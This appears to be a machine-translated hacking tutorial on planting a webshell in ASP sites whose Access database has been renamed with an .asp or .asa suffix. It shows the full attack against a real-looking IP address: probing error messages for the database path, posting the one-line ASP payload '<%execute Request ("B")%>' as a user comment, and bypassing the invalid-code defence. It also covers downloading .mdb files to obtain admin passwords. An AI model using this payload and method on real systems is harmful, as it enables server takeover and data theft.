may be with the development of network security technology, the quality of administrators are improving, in the use of access+asp system, for the database was downloaded, to the MDB to ASP or ASA. Do not say directly to change the suffix, directly can use the net fast and other tools to download directly, in fact, so you have opened the door for intruders. Intruders can use Asp/asa as a suffix database to get Webshell directly.
1. Thinking
everyone knows that <%%> is an ASP file identifier, that is, an ASP file will only be executed <%%> between the code, access+asp the Web system All data are stored in the database file (MDB file), Since the manager changed the MDB file to an ASP file, if the data we submitted contains <%%>, we will execute the code between <%%> when we visit the ASP database. This causes us to submit only malicious code to the database, then the ASP suffix database is our Webshell.
2. Sample
to find a goal, first of all, we Bauku to see whether the ASP suffix database:
<http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210>
return:
Microsoft VBScript Compiler Error Error ' 800a03f6 ' is missing ' end '/iishelp/common/500-100.asp, line? 4 Microsoft JET Database Engine error ' 800 04005 ' D:\log_mdb\%29dlog_mdb%29.asp ' is not a valid path. Determine if the path name is spelled correctly, and whether to connect to the server where the file is stored. /test/conn.asp, okay?
We submit:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp> return a heap of garbled, This way we can directly download the database directly with tools such as the Internet (we don't discuss it here). We go back to the homepage to see the "User Comments" feature available. We register a user, send a comment:
<%execute Request ("B")%>
so we put the ASP code: <%execute Request ("B")%> written to the database, then the database: is our Webshell slightly. Submitted:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp> at the end of the garbled we see:
/iishelp/common/500-100.asp, OK? 4 Microsoft VBScript run-time error error ' 800a000d ' type mismatch åä: ' Execut/test/dlog/log_mdb/%29dlog _mdb%29.asp, okay? 26
haha, our inserted code is running. The following figure:
Note: When we submit code to the database, the code content cannot be too large. So we use <%execute request ("B")%>.
3. Some other questions and ideas
1. For the conversion of the suffix to ASP, but also to the database to add <%= ' a ' -1%> and other illegal ASP code to completely prevent the download of the database, because there are illegal ASP code, insert our Webshell code after the run, will only show the previous illegal code error, Instead of executing our shell code. Although this can prevent a certain attack, but there is a certain hidden trouble, we just in the wrong code before adding compatible error code, you can get the correct display of the execution of our inserted Webshell code.
2. For the suffix is not changed, that is, MDB files, so we can download directly down to get the background password, into the background, you can use the database backup to change the suffix for ASP.
could be a big fuss for me, too.
